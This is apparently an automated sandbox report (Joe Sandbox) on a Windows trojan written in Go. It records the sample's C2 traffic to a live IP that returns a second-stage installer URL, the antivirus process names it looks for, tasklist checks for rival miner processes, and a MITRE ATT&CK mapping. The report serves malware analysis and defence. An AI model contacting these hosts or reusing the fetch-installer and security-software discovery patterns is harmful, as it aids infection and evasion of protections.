Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: AI7f43Z7AC.exe, 00000001.00000002.3382940903.000000C00031E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avguard.exe
Source: AI7f43Z7AC.exe, 00000001.00000002.3382940903.000000C000000000.00000004.00001000.00020000.00000000.sdmp, AI7f43Z7AC.exe, 00000001.00000002.3386724659.000000C000518000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cfp.exe
Source: AI7f43Z7AC.exe, 00000001.00000002.3382940903.000000C0000FE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: aswupdsv.exe
Source: AI7f43Z7AC.exe, 00000001.00000002.3382940903.000000C00031E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: AVuser.exe
Source: AI7f43Z7AC.exe, 00000001.00000002.3382940903.000000C00031E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avkwctl.exe
Source: AI7f43Z7AC.exe, 00000001.00000002.3382940903.000000C00031E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fsav32.exe
Source: AI7f43Z7AC.exe, 00000001.00000002.3382940903.000000C00031E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ashServ.exe
Source: AI7f43Z7AC.exe, 00000001.00000002.3382940903.000000C000000000.00000004.00001000.00020000.00000000.sdmp, AI7f43Z7AC.exe, 00000001.00000002.3386724659.000000C000518000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ZLCLIENT.exe
Source: AI7f43Z7AC.exe, 00000001.00000002.3382940903.000000C00031E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ashwebsv.exe
Source: AI7f43Z7AC.exe, 00000001.00000002.3386724659.000000C000518000.00000004.00001000.00020000.00000000.sdmp, AI7f43Z7AC.exe, 00000001.00000002.3382940903.000000C00036E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fsdfwd.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
DLL Side-Loading
11
Process Injection
11
Process Injection
OS Credential Dumping1
System Time Discovery
Remote ServicesData from Local System11
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
DLL Side-Loading
LSASS Memory11
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
System Information Discovery
SSHKeylogging1
Proxy
Scheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1574473 Sample: AI7f43Z7AC.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 60 20 Multi AV Scanner detection for submitted file 2->20 22 Found Tor onion address 2->22 24 Uses known network protocols on non-standard ports 2->24 26 AI detected suspicious sample 2->26 6 AI7f43Z7AC.exe 1 2->6         started        process3 dnsIp4 18 107.172.88.151, 3693, 49743, 49796 AS-COLOCROSSINGUS United States 6->18 28 Found Tor onion address 6->28 10 conhost.exe 6->10         started        12 tasklist.exe 1 6->12         started        14 tasklist.exe 1 6->14         started        16 35 other processes 6->16 signatures5 process6

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
AI7f43Z7AC.exe18%ReversingLabsWin64.Trojan.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://107.172.88.151:3693/get-url-win0%Avira URL Cloudsafe
http://176.120.72.138:9999/installer/wininiti0%Avira URL Cloudsafe
http://107.172.88.151:3693/get-url-winfailed0%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://107.172.88.151:3693/get-url-winfalse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://107.172.88.151:3693/get-url-winfailedAI7f43Z7AC.exefalse
  • Avira URL Cloud: safe
unknown
http://176.120.72.138:9999/installer/wininitiAI7f43Z7AC.exe, 00000001.00000002.3382940903.000000C00035C000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
107.172.88.151
unknownUnited States
36352AS-COLOCROSSINGUSfalse
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1574473
Start date and time:2024-12-13 11:01:58 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 20s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:41
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:AI7f43Z7AC.exe
renamed because original name is a hash value
Original Sample Name:c188e86f54843fc6f187d63a9c1f9327d1fff8167a9d5404661e1a6b78e3824f.exe
Detection:MAL
Classification:mal60.troj.evad.winEXE@583/0@0/1
EGA Information:Failed
HCA Information:Failed
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target AI7f43Z7AC.exe, PID 6120 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtWriteVirtualMemory calls found.
  • VT rate limit hit for: AI7f43Z7AC.exe
No simulations
No context
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
AS-COLOCROSSINGUS3S52TCXLd6.exeGet hashmaliciousXmrigBrowse
  • 107.172.43.186
job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
  • 5.252.235.172
job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
  • 5.252.235.172
greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
  • 192.3.101.149
goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
  • 107.172.44.175
creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
  • 192.210.150.24
Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
  • 192.210.150.24
SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
  • 107.172.44.175
Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
  • 23.95.235.29
SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
  • 192.210.150.17
No context
No context
No created / dropped files found
File type:PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):6.249242080781576
TrID:
  • Win64 Executable Console (202006/5) 92.65%
  • Win64 Executable (generic) (12005/4) 5.51%
  • Generic Win/DOS Executable (2004/3) 0.92%
  • DOS Executable Generic (2002/1) 0.92%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:AI7f43Z7AC.exe
File size:5'077'504 bytes
MD5:a7d826bf33220f0f9da9357416ff27ca
SHA1:16f0bba1fab5cae5663fbe4ba3f11d08bc0a6e79
SHA256:c188e86f54843fc6f187d63a9c1f9327d1fff8167a9d5404661e1a6b78e3824f
SHA512:d967b89a80df93bb9a181b94835a0c840b0619a5440c57af5328bac4c7e4c1ad6d23329f6de2ac6ee6ac0c221d33af10c8179b0015515f6af461744dbcb3b0ca
SSDEEP:49152:4nE6e65048hV5K6fY/fbDAr4IacxRg2w5E/OqNq1tEHkXi0C:c59MfsbDAMPnE/O9tAci0
TLSH:E6364B47FC9545F9C0AED231C96296627A717C485B3023D72BA0F3382F76BD4AAB9344
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........xM.......".......#..@................@...............................V...........`... ............................
Icon Hash:00928e8e8686b000
Entrypoint:0x46d7a0
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows cui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:1
File Version Major:6
File Version Minor:1
Subsystem Version Major:6
Subsystem Version Minor:1
Import Hash:c2d457ad8ac36fc9f18d45bffcd450c2
Instruction
jmp 00007F6408C02B50h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
dec eax
mov ebp, esp
pushfd
cld
dec eax
sub esp, 000000E0h
dec eax
mov dword ptr [esp], edi
dec eax
mov dword ptr [esp+08h], esi
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], ebx
dec esp
mov dword ptr [esp+20h], esp
dec esp
mov dword ptr [esp+28h], ebp
dec esp
mov dword ptr [esp+30h], esi
dec esp
mov dword ptr [esp+38h], edi
movups dqword ptr [esp+40h], xmm6
movups dqword ptr [esp+50h], xmm7
inc esp
movups dqword ptr [esp+60h], xmm0
inc esp
movups dqword ptr [esp+70h], xmm1
inc esp
movups dqword ptr [esp+00000080h], xmm2
inc esp
movups dqword ptr [esp+00000090h], xmm3
inc esp
movups dqword ptr [esp+000000A0h], xmm4
inc esp
movups dqword ptr [esp+000000B0h], xmm5
inc esp
movups dqword ptr [esp+000000C0h], xmm6
inc esp
movups dqword ptr [esp+000000D0h], xmm7
inc ebp
xorps xmm7, xmm7
dec ebp
xor esi, esi
dec eax
mov eax, dword ptr [004DAB22h]
dec eax
mov eax, dword ptr [eax]
dec eax
cmp eax, 00000000h
je 00007F6408C06435h
dec esp
mov esi, dword ptr [eax]
dec eax
sub esp, 10h
dec eax
mov eax, ecx
dec eax
mov ebx, edx
call 00007F6408C0732Bh
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x55e0000x554.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x54f0000xd47c.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x55f0000xa554.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x48d1000x180.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x2391460x239200d0522ecb4c9b4399de8404b91c853089unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x23b0000x251b080x251c00546afd6d4443cdeb4169f2b67d359735unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x48d0000xc19400x3400060d531d2b107f4816e0bb824e5aecc0aFalse0.41918006310096156data5.243348240248877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata0x54f0000xd47c0xd6002f5fee357aac1d467c7a8c3bd1135a6fFalse0.40192391939252337data5.471049355209043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata0x55d0000xb40x20041d1f5f0e184fd17541aa475371f5739False0.2265625shared library1.787112262798912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata0x55e0000x5540x6002789224e06b85722c117b87bac13eae9False0.380859375data4.042451224373785IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc0x55f0000xa5540xa6007ea963485df8683ea448b26db54ca21dFalse0.2702371987951807data5.444342829688715IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab0x56a0000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLLImport
kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler
TimestampSource PortDest PortSource IPDest IP
Dec 13, 2024 11:03:12.183895111 CET497433693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:12.303694010 CET369349743107.172.88.151192.168.2.6
Dec 13, 2024 11:03:12.303796053 CET497433693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:12.304217100 CET497433693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:12.425587893 CET369349743107.172.88.151192.168.2.6
Dec 13, 2024 11:03:13.412008047 CET369349743107.172.88.151192.168.2.6
Dec 13, 2024 11:03:13.412127018 CET369349743107.172.88.151192.168.2.6
Dec 13, 2024 11:03:13.412201881 CET497433693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:13.412283897 CET369349743107.172.88.151192.168.2.6
Dec 13, 2024 11:03:13.412353039 CET497433693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:13.412395954 CET497433693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:13.532473087 CET369349743107.172.88.151192.168.2.6
Dec 13, 2024 11:03:34.980150938 CET497963693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:35.100735903 CET369349796107.172.88.151192.168.2.6
Dec 13, 2024 11:03:35.100843906 CET497963693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:35.101100922 CET497963693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:35.220906019 CET369349796107.172.88.151192.168.2.6
Dec 13, 2024 11:03:36.209563017 CET369349796107.172.88.151192.168.2.6
Dec 13, 2024 11:03:36.209844112 CET369349796107.172.88.151192.168.2.6
Dec 13, 2024 11:03:36.209856033 CET369349796107.172.88.151192.168.2.6
Dec 13, 2024 11:03:36.209930897 CET497963693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:36.210010052 CET497963693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:36.329724073 CET369349796107.172.88.151192.168.2.6
Dec 13, 2024 11:03:58.920840025 CET498553693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:59.040662050 CET369349855107.172.88.151192.168.2.6
Dec 13, 2024 11:03:59.040754080 CET498553693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:59.041008949 CET498553693192.168.2.6107.172.88.151
Dec 13, 2024 11:03:59.160804033 CET369349855107.172.88.151192.168.2.6
Dec 13, 2024 11:04:00.146605015 CET369349855107.172.88.151192.168.2.6
Dec 13, 2024 11:04:00.146752119 CET369349855107.172.88.151192.168.2.6
Dec 13, 2024 11:04:00.146764994 CET369349855107.172.88.151192.168.2.6
Dec 13, 2024 11:04:00.146822929 CET498553693192.168.2.6107.172.88.151
Dec 13, 2024 11:04:00.146969080 CET498553693192.168.2.6107.172.88.151
Dec 13, 2024 11:04:00.267000914 CET369349855107.172.88.151192.168.2.6
Dec 13, 2024 11:04:20.875124931 CET499083693192.168.2.6107.172.88.151
Dec 13, 2024 11:04:20.995618105 CET369349908107.172.88.151192.168.2.6
Dec 13, 2024 11:04:20.995739937 CET499083693192.168.2.6107.172.88.151
Dec 13, 2024 11:04:20.996118069 CET499083693192.168.2.6107.172.88.151
Dec 13, 2024 11:04:21.115859032 CET369349908107.172.88.151192.168.2.6
Dec 13, 2024 11:04:22.115297079 CET369349908107.172.88.151192.168.2.6
Dec 13, 2024 11:04:22.115358114 CET369349908107.172.88.151192.168.2.6
Dec 13, 2024 11:04:22.115485907 CET499083693192.168.2.6107.172.88.151
Dec 13, 2024 11:04:22.115515947 CET499083693192.168.2.6107.172.88.151
Dec 13, 2024 11:04:22.235260010 CET369349908107.172.88.151192.168.2.6
Dec 13, 2024 11:04:44.192292929 CET499603693192.168.2.6107.172.88.151
Dec 13, 2024 11:04:44.312124014 CET369349960107.172.88.151192.168.2.6
Dec 13, 2024 11:04:44.312201023 CET499603693192.168.2.6107.172.88.151
Dec 13, 2024 11:04:44.312508106 CET499603693192.168.2.6107.172.88.151
Dec 13, 2024 11:04:44.432210922 CET369349960107.172.88.151192.168.2.6
Dec 13, 2024 11:04:45.418752909 CET369349960107.172.88.151192.168.2.6
Dec 13, 2024 11:04:45.418798923 CET369349960107.172.88.151192.168.2.6
Dec 13, 2024 11:04:45.418837070 CET369349960107.172.88.151192.168.2.6
Dec 13, 2024 11:04:45.418870926 CET499603693192.168.2.6107.172.88.151
Dec 13, 2024 11:04:45.418936968 CET499603693192.168.2.6107.172.88.151
Dec 13, 2024 11:04:45.418989897 CET499603693192.168.2.6107.172.88.151
Dec 13, 2024 11:04:45.538799047 CET369349960107.172.88.151192.168.2.6
  • 107.172.88.151:3693
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.649743107.172.88.15136936120C:\Users\user\Desktop\AI7f43Z7AC.exe
TimestampBytes transferredDirectionData
Dec 13, 2024 11:03:12.304217100 CET111OUTGET /get-url-win HTTP/1.1
Host: 107.172.88.151:3693
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Dec 13, 2024 11:03:13.412008047 CET199INHTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.2
Date: Fri, 13 Dec 2024 10:03:13 GMT
Content-type: application/octet-stream
Content-Length: 46
Last-Modified: Thu, 12 Dec 2024 05:36:54 GMT


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1192.168.2.649796107.172.88.15136936120C:\Users\user\Desktop\AI7f43Z7AC.exe
TimestampBytes transferredDirectionData
Dec 13, 2024 11:03:35.101100922 CET111OUTGET /get-url-win HTTP/1.1
Host: 107.172.88.151:3693
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Dec 13, 2024 11:03:36.209563017 CET199INHTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.2
Date: Fri, 13 Dec 2024 10:03:36 GMT
Content-type: application/octet-stream
Content-Length: 46
Last-Modified: Thu, 12 Dec 2024 05:36:54 GMT


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2192.168.2.649855107.172.88.15136936120C:\Users\user\Desktop\AI7f43Z7AC.exe
TimestampBytes transferredDirectionData
Dec 13, 2024 11:03:59.041008949 CET111OUTGET /get-url-win HTTP/1.1
Host: 107.172.88.151:3693
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Dec 13, 2024 11:04:00.146605015 CET199INHTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.2
Date: Fri, 13 Dec 2024 10:03:59 GMT
Content-type: application/octet-stream
Content-Length: 46
Last-Modified: Thu, 12 Dec 2024 05:36:54 GMT


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
3192.168.2.649908107.172.88.15136936120C:\Users\user\Desktop\AI7f43Z7AC.exe
TimestampBytes transferredDirectionData
Dec 13, 2024 11:04:20.996118069 CET111OUTGET /get-url-win HTTP/1.1
Host: 107.172.88.151:3693
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Dec 13, 2024 11:04:22.115297079 CET245INHTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.2
Date: Fri, 13 Dec 2024 10:04:21 GMT
Content-type: application/octet-stream
Content-Length: 46
Last-Modified: Thu, 12 Dec 2024 05:36:54 GMT
Data Raw: 68 74 74 70 3a 2f 2f 31 37 36 2e 31 32 30 2e 37 32 2e 31 33 38 3a 39 39 39 39 2f 69 6e 73 74 61 6c 6c 65 72 2f 77 69 6e 69 6e 69 74 69 0a
Data Ascii: http://176.120.72.138:9999/installer/wininiti


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
4192.168.2.649960107.172.88.15136936120C:\Users\user\Desktop\AI7f43Z7AC.exe
TimestampBytes transferredDirectionData
Dec 13, 2024 11:04:44.312508106 CET111OUTGET /get-url-win HTTP/1.1
Host: 107.172.88.151:3693
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Dec 13, 2024 11:04:45.418752909 CET199INHTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.2
Date: Fri, 13 Dec 2024 10:04:45 GMT
Content-type: application/octet-stream
Content-Length: 46
Last-Modified: Thu, 12 Dec 2024 05:36:54 GMT


Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:1
Start time:05:02:50
Start date:13/12/2024
Path:C:\Users\user\Desktop\AI7f43Z7AC.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\AI7f43Z7AC.exe"
Imagebase:0x6a0000
File size:5'077'504 bytes
MD5 hash:A7D826BF33220F0F9DA9357416FF27CA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Go lang
Reputation:low
Has exited:false

Target ID:2
Start time:05:02:50
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:3
Start time:05:02:51
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq ksoftriqd.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:4
Start time:05:02:51
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq network0.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:5
Start time:05:02:52
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq kthreaddi].exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:6
Start time:05:02:52
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq kthreaddi.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:7
Start time:05:02:52
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq kthreaddk.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:8
Start time:05:02:53
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq sysrv.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:9
Start time:05:02:53
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq c3pool.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:10
Start time:05:02:53
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq kthreaddk.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
